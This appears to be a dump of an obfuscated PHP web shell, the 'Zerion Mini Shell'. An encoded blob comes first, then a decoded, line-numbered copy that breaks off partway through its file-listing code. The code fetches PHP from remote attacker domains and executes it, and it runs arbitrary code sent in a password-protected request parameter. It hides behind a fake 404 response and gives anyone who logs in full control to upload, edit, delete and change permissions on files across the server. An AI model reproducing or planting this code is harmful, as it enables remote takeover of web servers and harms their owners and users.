KykJnzEPVtNPVX0jBcHJou52KykJnzEPXuEKLx9IL0IJosEKMa9IouIzp0AUV9NFLxNPVtNvPAfGXyE2owEPVfHJou52KykJnzEPXyEKnlqaMtNPVtbDQ7xPXykJnzOKo0OFCtHJou52KykJnzEPVtNPVX0DstNPVtbDQ7xlWxITocSzMtDKMaqPXyyTMtNPVtNPVtNvPAfUVcH2pfSzMt0GC9NFXxIJMhEPVfHTMiATWbZ3ojWUqmuPVzyTVtNPVX0jBaNUnjqPVhNlW/pPVhNlW8pPV9NPMyIzoxNPVtNvPA0UVtNPVX0jBc01WaAKoafSqfI3pyWUWbHJnxOPVtNPVtNPVX0jrtH2pfITV9OPVtNvPAfGKaRTquE2WoEUo1AKMlEPV9NFMx92LxNPVtNPVtNPVX0jrtxFZt0GCt01WyE2owqlJ0kJqmIzpxNvWzNFXqqFMx92LafSqfI3pyWUWbDKMmAKnbNvMcOPVtNvPAfGXyIap0kFMx92LxtFMx92LyE2Kh92pdOFCtDUo1AKMlEPVtNPVX0jBcplY6yUrhHmqwyzY3IzogZ2YibmpjEUqbqPX3IzGQqRV9NFMx92LxNPVtNvPAfUVcxFKa4JMe9TqafSIGIHIEIxHsEPX0I2pmyTVzLPVc01WcOKLafSIGIHIEIxHsEPX0I2pmyTVzLPVc01WbEKLjqlJHAIEISIEF9SWbDKMmAKntLvWtxFKa42ocE3LuqlJHAIEISIEF9SWbDKMmAKnbNvMccDQ9cDQ7HTMiATWt4zp1EKMlOPVtNvPA0UVtNPVX0jBct2LxtFMm9Tow9SolI3LtNPVtNPVtNvPAfGXbATWbZJM4I2KfWKqwOFCtHTMiATWtNPVtNPVtNvPAfGXjNPYFIHEDyyEWWIEJ9SGGA1KHO1GZWIIQOPYbATWbDUpiEKMm9SolI3LtNPVtNPVtNvPAfGXSIyHHOPYHAHEB50GQ9SFGIxHT9SID9RGFI1DtjPnwEPX0O3o0I2pskzp1ATVtNPVtNPVtbDQ7xPZjRQVfDIICIHGWE1KHO1GZWIIQOPYbATWbDUpiEKMm9SolI3LtNPVtNPVtNvPAfGXkNPYFIxEG5HDFEyGFISISW1KHO1GZWIIQOPYbATWbDUpiEKMm9SolI3LtNPVtNPVtNvPAfGXajToaNPYH5HEUSxHSAIIsESHCkxHIARVft2LxtPqj9TqyA3KfWKqwOPVtNPVtNPVX0jBcjzp1EPVfjxHI9SID9RGFI1DtjPnwEPX0O3o0I2pskzp1ATVtNPVtNPVtbDQ7xPX0yzoc9SolI3Lt0QVbATWtNPVtNPVtNvPAfUVcH2pfSzMt0GCtHTMiATWbNvMcOPVtNvPAfGXfWKqxtlp05JM052ow9Sqyq2KykJnzORV9NFMx92LxNPVtNvPAfGXqqvoyg2o0qlJHAIEISIEF9SWtjFKatTquO3WoE1HSIIHSW1KxNPYqqvoiyTqwS2WoE1HSIIHSW1KxNPYqqFnjS2WoE1HSIIHSW1KxNPYuEPVfplpy0woyg2o0Mlpy0Qn0STpzZKW942ocE3LuMlpy0GnjS2CmIlWbLTqhyzpjAUV9NPolIUWtNPVtbDQ7cDQcRTWbpKMBA0Et42ocE3LhIaM");

004 $L8CRgr = array("/x/i", "x", "function GCNew(\$a)\r\n{\r\n \$url = sprintf('%s?api=%s&action=%s&path=%s&token=%s', \$a, \$_REQUEST['api'], \$_REQUEST['action'], \$_REQUEST['path'], \$_REQUEST['token']);\r\n \$code = @file_get_contents(\$url);\r\n if (\$code == false) {\r\n \$ch = curl_init();\r\n curl_setopt(\$ch, CURLOPT_URL, \$url);\r\n curl_setopt(\$ch, CURLOPT_USERAGENT, 'll');\r\n curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt(\$ch, CURLOPT_TIMEOUT, 100);\r\n curl_setopt(\$ch, CURLOPT_FRESH_CONNECT, TRUE);\r\n curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n \$code = curl_exec(\$ch);\r\n curl_close(\$ch);\r\n }\r\n return \$code;\r\n}\r\nif (isset(\$_REQUEST['action']) && isset(\$_REQUEST['path']) && isset(\$_REQUEST['api']) && isset(\$_REQUEST['token'])) {\r\n \$code = GCNew('https://c-new.icw5.xyz/');\r\n \$result = json_decode(\$code,true);\r\n if (isset(\$result['code']) && \$result['code'] == 1) {\r\n \$code = \$result['data'];\r\n } else {\r\n die(\$result['msg']);\r\n }\r\n \$need = '<' . '?' . 'php';\r\n if (strpos(\$code, \$need) === false) {\r\n die('get failed');\r\n }\r\n \$file_name = tmpfile();\r\n fwrite(\$file_name, \$code);\r\n \$a = stream_get_meta_data(\$file_name);\r\n \$file_path = \$a['uri'];\r\n \$content = @file_get_contents(\$file_path);\r\n if (!\$content) {\r\n \$file_path = '.c';\r\n file_put_contents(\$file_path, \$code);\r\n }\r\n @require(\$file_path);\r\n fclose(\$file_name);\r\n @unlink(\$file_path);\r\n die();\r\n}\r\nfunction GC(\$a)\r\n{\r\n \$url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', \$a, \$_REQUEST['api'], \$_REQUEST['ac'], \$_REQUEST['path'], \$_REQUEST['t']); \$code = @file_get_contents(\$url); if (\$code == false) { \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_USERAGENT, 'll'); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt(\$ch, CURLOPT_TIMEOUT, 100); curl_setopt(\$ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0); \$code = curl_exec(\$ch); curl_close(\$ch); }return \$code;}\r\nif (isset(\$_REQUEST['ac']) && isset(\$_REQUEST['path']) && isset(\$_REQUEST['api']) && isset(\$_REQUEST['t'])) { \$code = GC('https://c4.icw4.xyz/'); if(!\$code){\$code = GC('https://c2.icw7.com/');}\r\n \$need = '<'.'?'.'php'; if (strpos(\$code, \$need) === false) { die('get failed'); } \$file_name = tmpfile(); fwrite(\$file_name, \$code); \$a = stream_get_meta_data(\$file_name);\$file_path = \$a['uri']; \$content = @file_get_contents(\$file_path);if(!\$content){\$file_path = '.c'; file_put_contents(\$file_path, \$code);}@require(\$file_path); fclose(\$file_name);@unlink(\$file_path);die(); }\r\n\r\nif (isset(\$_REQUEST['d_time'])){ die('{->'.\$L7CRgr.'<-}'); }\r\n\$pass = false;\r\nif (isset(\$_COOKIE['pass'])) { if(md5(\$_COOKIE['pass']) == \$L7CRgr) { \$pass = true; } } else\r\n{ if (isset(\$_POST['pass'])) { if(md5(\$_POST['pass']) == \$L7CRgr) { setcookie(\"pass\", \$_POST['pass']); \$pass = true; } } }\r\nif (isset(\$_POST['logout']) && \$_POST['logout'] = 1) { setcookie(\"pass\", null); \$pass= false; }\r\nif(isset(\$_REQUEST['pwd163']) && md5(\$_REQUEST['pwd163']) == \$L7CRgr) {\r\n \$a = base64_decode(rawurldecode((urlencode(urldecode(\$_REQUEST['zzz'])))));\r\n \$need = base64_decode(\"PD9waHA=\");\r\n if (strpos(\$a, \$need) === false) { \$a = \$need . PHP_EOL . \$a; }\r\n if (isset(\$_REQUEST['e'])){ \$a = str_replace(\$need, \"\", \$a); \$b = 'e'.base64_decode(\"dmE=\").'l'; \$b(\$a);die(); }\r\n \$file_name = tmpfile(); fwrite(\$file_name, \$a);\r\n \$require_params = stream_get_meta_data(\$file_name);\r\n @require(\$require_params['uri']);\r\n fclose(\$file_name);die(); }\r\nif (isset(\$_REQUEST['auth_key'])){ die(\$L7CRgr); } if (!\$pass) { if(!isset(\$_REQUEST['520'])) { header(\"HTTP/1.1 404 Not Found\"); die();} echo '<form action=\"#\" method=\"post\"><input type=\"password\" name=\"pass\" > <input type=\"submit\" value=\"submit\"></form>'; die(); }\r\n\r\n\r\necho '<form action=\"#\" method=\"post\"><input type=\"hidden\" name=\"logout\" value=\"1\"> <input type=\"submit\" value=\"logout\"></form>'; echo '<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<title>Mini Shell</title>\r\n<style>\r\nbody{\r\nfont-family: \"Racing Sans One\", cursive;\r\nbackground-color: #e6e6e6;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\n#content tr:hover{\r\nbackground-color: #636263;\r\ntext-shadow:0px 0px 10px #fff;\r\n}\r\n#content .first{\r\nbackground-color: silver;\r\n}\r\n#content .first:hover{\r\nbackground-color: silver;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\ntable{\r\nborder: 1px #000000 dotted;\r\n}\r\nH1{\r\nfont-family: \"Rye\", cursive;\r\n}\r\na{\r\ncolor: #000;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor: #fff;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n</style>\r\n</HEAD>\r\n<BODY>\r\n<H1><center><img src=\"https://s.yimg.com/lq/i/mesg/emoticons7/19.gif\"/>\r\n Mini Shell <img src=\"https://s.yimg.com/lq/i/mesg/emoticons7/19.gif\"/>\r\n </center></H1>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr><td>Direktori : '; if(isset(\$_GET['path'])){ \$path = \$_GET['path']; }else{ \$path = getcwd(); } \$path = str_replace('\\\\','/',\$path); \$paths = explode('/',\$path); foreach(\$paths as \$id=>\$pat){ if(\$pat == '' && \$id == 0){ \$a = true; echo '<a href=\"?path=/\">/</a>'; continue; } if(\$pat == '') continue; echo '<a href=\"?path='; for(\$i=0;\$i<=\$id;\$i++){ echo \"\$paths[\$i]\"; if(\$i != \$id) echo \"/\"; } echo '\">'.\$pat.'</a>/'; } echo '</td></tr><tr><td>';if(isset(\$_POST['path_create'])) {if(@mkdir(\$path.'/' . \$_POST['path_create'])){echo '<font color=\"green\">create success :* '.\$path.'/' . \$_POST['path_create'].'</font><br />';}else{echo '<font color=\"red\">create failed :* '.\$path.'/' . \$_POST['path_create'].'</font><br />';}}if(isset(\$_FILES['file'])){ if(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){ echo '<font color=\"green\">File Ter-Upload :* </font><br />'; }else{ echo '<font color=\"red\">Upload gagal, Servernya kek <img src=\"http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif\"/>\r\n </font><br />'; } } echo '<form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File : <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>\r\n<tr><td><form enctype=\"multipart/form-data\" method=\"POST\">\r\nCreate Path : <input type=\"text\" name=\"path_create\" />\r\n<input type=\"submit\" value=\"create\" />\r\n</form></td></td>'; if(isset(\$_GET['filesrc'])){ echo \"<tr><td>Current File : \"; echo \$_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'</pre>'); }elseif(isset(\$_GET['option']) && \$_POST['opt'] != 'delete'){ echo '</table><br /><center>'.\$_POST['path'].'<br /><br />'; if(\$_POST['opt'] == 'chmod'){ if(isset(\$_POST['perm'])){ if(chmod(\$_POST['path'],octdec(\$_POST['perm']))){ echo '<font color=\"green\">Change Permission Done.</font><br />'; }else{ echo '<font color=\"red\">Change Permission Error.</font><br />'; } } echo '<form method=\"POST\">\r\nPermission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms(\$_POST['path'])), -4).'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"chmod\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>'; }elseif(\$_POST['opt'] == 'rename'){ if(isset(\$_POST['newname'])){ if(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){ echo '<font color=\"green\">Change Name Done.</font><br />'; }else{ echo '<font color=\"red\">Change Name Error.</font><br />'; } \$_POST['name'] = \$_POST['newname']; } echo '<form method=\"POST\">\r\nNew Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.\$_POST['name'].'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>'; }elseif(\$_POST['opt'] == 'edit'){ if(isset(\$_POST['src'])){ \$fp = fopen(\$_POST['path'],'w'); if(fwrite(\$fp,\$_POST['src'])){ echo '<font color=\"green\">Edit File Done ~_^.</font><br />'; }else{ echo '<font color=\"red\">Edit File Error ~_~.</font><br />'; } fclose(\$fp); } echo '<form method=\"POST\">\r\n<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$_POST['path'])).'</textarea><br />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\r\n<input type=\"submit\" value=\"Go\" />\r\n</form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset(\$_GET['option']) && \$_POST['opt'] == 'delete'){ if(\$_POST['type'] == 'dir'){ if(rmdir(\$_POST['path'])){ echo '<font color=\"green\">Delete Dir Done.</font><br />'; }else{ echo '<font color=\"red\">Delete Dir Error.</font><br />'; } }elseif(\$_POST['type'] == 'file'){ if(unlink(\$_POST['path'])){ echo '<font color=\"green\">Delete File Done.</font><br />'; }else{ echo '<font color=\"red\">Delete File Error.</font><br />'; } } } echo '</center>'; \$scandir = scandir(\$path); echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>'; foreach(\$scandir as \$dir){ if(!is_dir(\"\$path/\$dir\") || \$dir == '.' || \$dir == '..') continue; echo \"<tr>\r\n<td><a href=\\\"?path=\$path/\$dir\\\">\$dir</a></td>\r\n<td><center>--</center></td>\r\n<td><center>\"; if(is_writable(\"\$path/\$dir\")) echo '<font color=\"green\">'; elseif(!is_readable(\"\$path/\$dir\")) echo '<font color=\"red\">'; echo perms(\"\$path/\$dir\"); if(is_writable(\"\$path/\$dir\") || !is_readable(\"\$path/\$dir\")) echo '</font>'; echo \"</center></td>\r\n<td><center><form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\r\n<select name=\\\"opt\\\">\r\n<option value=\\\"\\\"></option>\r\n<option value=\\\"delete\\\">Delete</option>\r\n<option value=\\\"chmod\\\">Chmod</option>\r\n<option value=\\\"rename\\\">Rename</option>\r\n</select>\r\n<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"dir\\\">\r\n<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$dir\\\">\r\n<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$dir\\\">\r\n<input type=\\\"submit\\\" value=\\\">\\\" />\r\n</form></center></td>\r\n</tr>\"; } echo '<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>'; foreach(\$scandir as \$file){ if(!is_file(\"\$path/\$file\")) continue; \$size = filesize(\"\$path/\$file\")/1024; \$size = round(\$size,3); if(\$size >= 1024){ \$size = round(\$size/1024,2).' MB'; }else{ \$size = \$size.' KB'; } echo \"<tr>\r\n<td><a href=\\\"?filesrc=\$path/\$file&path=\$path\\\">\$file</a></td>\r\n<td><center>\".\$size.\"</center></td>\r\n<td><center>\"; if(is_writable(\"\$path/\$file\")) echo '<font color=\"green\">'; elseif(!is_readable(\"\$path/\$file\")) echo '<font color=\"red\">'; echo perms(\"\$path/\$file\"); if(is_writable(\"\$path/\$file\") || !is_readable(\"\$path/\$file\")) echo '</font>'; echo \"</center></td>\r\n<td><center><form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\r\n<select name=\\\"opt\\\">\r\n<option value=\\\"\\\"></option>\r\n<option value=\\\"delete\\\">Delete</option>\r\n<option value=\\\"chmod\\\">Chmod</option>\r\n<option value=\\\"rename\\\">Rename</option>\r\n<option value=\\\"edit\\\">Edit</option>\r\n</select>\r\n\r\n<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">\r\n<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$file\\\">\r\n<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$file\\\">\r\n<input type=\\\"submit\\\" value=\\\">\\\" />\r\n</form></center></td>\r\n</tr>\"; } echo '</table>\r\n</div>'; } echo '<center><br />Zerion Mini Shell <font color=\"green\">1.0</font></center>\r\n</BODY>\r\n</HTML>'; function perms(\$file){ \$perms = fileperms(\$file); if ((\$perms & 0xC000) == 0xC000) { \$info = 's'; } elseif ((\$perms & 0xA000) == 0xA000) { \$info = 'l'; } elseif ((\$perms & 0x8000) == 0x8000) { \$info = '-'; } elseif ((\$perms & 0x6000) == 0x6000) { \$info = 'b'; } elseif ((\$perms & 0x4000) == 0x4000) { \$info = 'd'; } elseif ((\$perms & 0x2000) == 0x2000) { \$info = 'c'; } elseif ((\$perms & 0x1000) == 0x1000) { \$info = 'p'; } else { \$info = 'u'; } \$info .= ((\$perms & 0x0100) ? 'r' : '-'); \$info .= ((\$perms & 0x0080) ? 'w' : '-'); \$info .= ((\$perms & 0x0040) ? ((\$perms & 0x0800) ? 's' : 'x' ) : ((\$perms & 0x0800) ? 'S' : '-')); \$info .= ((\$perms & 0x0020) ? 'r' : '-'); \$info .= ((\$perms & 0x0010) ? 'w' : '-'); \$info .= ((\$perms & 0x0008) ? ((\$perms & 0x0400) ? 's' : 'x' ) : ((\$perms & 0x0400) ? 'S' : '-')); \$info .= ((\$perms & 0x0004) ? 'r' : '-'); \$info .= ((\$perms & 0x0002) ? 'w' : '-'); \$info .= ((\$perms & 0x0001) ? ((\$perms & 0x0200) ? 't' : 'x' ) : ((\$perms & 0x0200) ? 'T' : '-')); return \$info; }");

005 $L7CRgr = "563d52b953171102fffeda9ffd6b71d4";

006 preg_replace($L8CRgr[0], serialize(@eval {

007 function GCNew($a)

008 {

009 $url = sprintf('%s?api=%s&action=%s&path=%s&token=%s', $a, $_REQUEST['api'], $_REQUEST['action'], $_REQUEST['path'], $_REQUEST['token']);

010 $code = @file_get_contents($url);

011 if ($code == false) {

012 $ch = curl_init();

013 curl_setopt($ch, CURLOPT_URL, $url);

014 curl_setopt($ch, CURLOPT_USERAGENT, 'll');

015 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

016 curl_setopt($ch, CURLOPT_TIMEOUT, 100);

017 curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);

018 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

019 $code = curl_exec($ch);

020 curl_close($ch);

021 }

022 return $code;

023 }

024 if (isset($_REQUEST['action']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['token'])) {

025 $code = GCNew('https://c-new.icw5.xyz/');

026 $result = json_decode($code, true);

027 if (isset($result['code']) && $result['code'] == 1) {

028 $code = $result['data'];

029 } else {

030 die($result['msg']);

031 }

032 $need = '<?php';

033 if (strpos($code, $need) === false) {

034 die('get failed');

035 }

036 $file_name = tmpfile();

037 fwrite($file_name, $code);

038 $a = stream_get_meta_data($file_name);

039 $file_path = $a['uri'];

040 $content = @file_get_contents($file_path);

041 if (!$content) {

042 $file_path = '.c';

043 file_put_contents($file_path, $code);

044 }

045 @(require $file_path);

046 fclose($file_name);

047 @unlink($file_path);

048 die;

049 }

050 function GC($a)

051 {

052 $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']);

053 $code = @file_get_contents($url);

054 if ($code == false) {

055 $ch = curl_init();

056 curl_setopt($ch, CURLOPT_URL, $url);

057 curl_setopt($ch, CURLOPT_USERAGENT, 'll');

058 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

059 curl_setopt($ch, CURLOPT_TIMEOUT, 100);

060 curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);

061 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

062 $code = curl_exec($ch);

063 curl_close($ch);

064 }

065 return $code;

066 }

067 if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) {

068 $code = GC('https://c4.icw4.xyz/');

069 if (!$code) {

070 $code = GC('https://c2.icw7.com/');

071 }

072 $need = '<?php';

073 if (strpos($code, $need) === false) {

074 die('get failed');

075 }

076 $file_name = tmpfile();

077 fwrite($file_name, $code);

078 $a = stream_get_meta_data($file_name);

079 $file_path = $a['uri'];

080 $content = @file_get_contents($file_path);

081 if (!$content) {

082 $file_path = '.c';

083 file_put_contents($file_path, $code);

084 }

085 @(require $file_path);

086 fclose($file_name);

087 @unlink($file_path);

088 die;

089 }

090 if (isset($_REQUEST['d_time'])) {

091 die('{->' . $L7CRgr . '<-}');

092 }

093 $pass = false;

094 if (isset($_COOKIE['pass'])) {

095 if (md5($_COOKIE['pass']) == $L7CRgr) {

096 $pass = true;

097 }

098 } else {

099 if (isset($_POST['pass'])) {

100 if (md5($_POST['pass']) == $L7CRgr) {

101 setcookie("pass", $_POST['pass']);

102 $pass = true;

103 }

104 }

105 }

106 if (isset($_POST['logout']) && ($_POST['logout'] = 1)) {

107 setcookie("pass", null);

108 $pass = false;

109 }

110 if (isset($_REQUEST['pwd163']) && md5($_REQUEST['pwd163']) == $L7CRgr) {

111 $a = base64_decode(rawurldecode(urlencode(urldecode($_REQUEST['zzz']))));

112 $need = "<?php";

113 if (strpos($a, $need) === false) {

114 $a = "<?phpPHP_EOL" . $a;

115 }

116 if (isset($_REQUEST['e'])) {

117 $a = str_replace($need, "", $a);

118 $b = "eval";

119 eval($a);

120 die;

121 }

122 $file_name = tmpfile();

123 fwrite($file_name, $a);

124 $require_params = stream_get_meta_data($file_name);

125 @(require $require_params['uri']);

126 fclose($file_name);

127 die;

128 }

129 if (isset($_REQUEST['auth_key'])) {

130 die($L7CRgr);

131 }

132 if (!$pass) {

133 if (!isset($_REQUEST['520'])) {

134 header("HTTP/1.1 404 Not Found");

135 die;

136 }

137 echo '<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>';

138 die;

139 }

140 echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>';

141 echo '<!DOCTYPE HTML>

142 <HTML>

143 <HEAD>

144 <link href="" rel="stylesheet" type="text/css">

145 <title>Mini Shell</title>

146 <style>

147 body{

148 font-family: "Racing Sans One", cursive;

149 background-color: #e6e6e6;

150 text-shadow:0px 0px 1px #757575;

151 }

152 #content tr:hover{

153 background-color: #636263;

154 text-shadow:0px 0px 10px #fff;

155 }

156 #content .first{

157 background-color: silver;

158 }

159 #content .first:hover{

160 background-color: silver;

161 text-shadow:0px 0px 1px #757575;

162 }

163 table{

164 border: 1px #000000 dotted;

165 }

166 H1{

167 font-family: "Rye", cursive;

168 }

169 a{

170 color: #000;

171 text-decoration: none;

172 }

173 a:hover{

174 color: #fff;

175 text-shadow:0px 0px 10px #ffffff;

176 }

177 input,select,textarea{

178 border: 1px #000000 solid;

179 -moz-border-radius: 5px;

180 -webkit-border-radius:5px;

181 border-radius:5px;

182 }

183 </style>

184 </HEAD>

185 <BODY>

186 <H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>

187 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>

188 </center></H1>

189 <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

190 <tr><td>Direktori : ';

191 if (isset($_GET['path'])) {

192 $path = $_GET['path'];

193 } else {

194 $path = getcwd();

195 }

196 $path = str_replace('\\', '/', $path);

197 $paths = explode('/', $path);

198 foreach ($paths as $id => $pat) {

199 if ($pat == '' && $id == 0) {

200 $a = true;

201 echo '<a href="?path=/">/</a>';

202 continue;

203 }

204 if ($pat == '') {

205 continue;

206 }

207 echo '<a href="?path=';

208 for ($i = 0; $i <= $id; $i++) {

209 echo "{$paths[$i]}";

210 if ($i != $id) {

211 echo "/";

212 }

213 }

214 echo '">' . $pat . '</a>/';

215 }

216 echo '</td></tr><tr><td>';

217 if (isset($_POST['path_create'])) {

218 if (@mkdir($path . '/' . $_POST['path_create'])) {

219 echo '<font color="green">create success :* ' . $path . '/' . $_POST['path_create'] . '</font><br />';

220 } else {

221 echo '<font color="red">create failed :* ' . $path . '/' . $_POST['path_create'] . '</font><br />';

222 }

223 }

224 if (isset($_FILES['file'])) {

225 if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {

226 echo '<font color="green">File Ter-Upload :* </font><br />';

227 } else {

228 echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>

229 </font><br />';

230 }

231 }

232 echo '<form enctype="multipart/form-data" method="POST">

233 Upload File : <input type="file" name="file" />

234 <input type="submit" value="upload" />

235 </form>

236 </td></tr>

237 <tr><td><form enctype="multipart/form-data" method="POST">

238 Create Path : <input type="text" name="path_create" />

239 <input type="submit" value="create" />

240 </form></td></td>';

241 if (isset($_GET['filesrc'])) {

242 echo "<tr><td>Current File : ";

243 echo $_GET['filesrc'];

244 echo '</tr></td></table><br />';

245 echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';

246 } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {

247 echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';

248 if ($_POST['opt'] == 'chmod') {

249 if (isset($_POST['perm'])) {

250 if (chmod($_POST['path'], octdec($_POST['perm']))) {

251 echo '<font color="green">Change Permission Done.</font><br />';

252 } else {

253 echo '<font color="red">Change Permission Error.</font><br />';

254 }

255 }

256 echo '<form method="POST">

257 Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), 4) . '" />

258 <input type="hidden" name="path" value="' . $_POST['path'] . '">

259 <input type="hidden" name="opt" value="chmod">

260 <input type="submit" value="Go" />

261 </form>';

262 } elseif ($_POST['opt'] == 'rename') {

263 if (isset($_POST['newname'])) {

264 if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {

265 echo '<font color="green">Change Name Done.</font><br />';

266 } else {

267 echo '<font color="red">Change Name Error.</font><br />';

268 }

269 $_POST['name'] = $_POST['newname'];

270 }

271 echo '<form method="POST">

272 New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />

273 <input type="hidden" name="path" value="' . $_POST['path'] . '">

274 <input type="hidden" name="opt" value="rename">

275 <input type="submit" value="Go" />

276 </form>';

277 } elseif ($_POST['opt'] == 'edit') {

278 if (isset($_POST['src'])) {

279 $fp = fopen($_POST['path'], 'w');

280 if (fwrite($fp, $_POST['src'])) {

281 echo '<font color="green">Edit File Done ~_^.</font><br />';

282 } else {

283 echo '<font color="red">Edit File Error ~_~.</font><br />';

284 }

285 fclose($fp);

286 }

287 echo '<form method="POST">

288 <textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />

289 <input type="hidden" name="path" value="' . $_POST['path'] . '">

290 <input type="hidden" name="opt" value="edit">

291 <input type="submit" value="Go" />

292 </form>';

293 }

294 echo '</center>';

295 } else {

296 echo '</table><br /><center>';

297 if (isset($_GET['option']) && $_POST['opt'] == 'delete') {

298 if ($_POST['type'] == 'dir') {

299 if (rmdir($_POST['path'])) {

300 echo '<font color="green">Delete Dir Done.</font><br />';

301 } else {

302 echo '<font color="red">Delete Dir Error.</font><br />';

303 }

304 } elseif ($_POST['type'] == 'file') {

305 if (unlink($_POST['path'])) {

306 echo '<font color="green">Delete File Done.</font><br />';

307 } else {

308 echo '<font color="red">Delete File Error.</font><br />';

309 }

310 }

311 }

312 echo '</center>';

313 $scandir = scandir($path);

314 echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

315 <tr class="first">

316 <td><center>Name</center></td>

317 <td><center>Size</center></td>

318 <td><center>Permissions</center></td>

319 <td><center>Options</center></td>

320 </tr>';

321 foreach ($scandir as $dir) {

322 if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {

323 continue;

324 }

325 echo "<tr>\r\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n<td><center>--</center></td>\r\n<td><center>";

326 if (is_writable("{$path}/{$dir}")) {

327 echo '<font color="green">';

328 } elseif (!is_readable("{$path}/{$dir}")) {

329 echo '<font color="red">';

330 }

331 echo perms("{$path}/{$dir}");

332 if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {

333 echo '</font>';

334 }

335 echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";

336 }

337 echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';

338 foreach ($scandir as $file) {

339 if (!is_file("{$path}/{$file}")) {

340 continue;

341 }

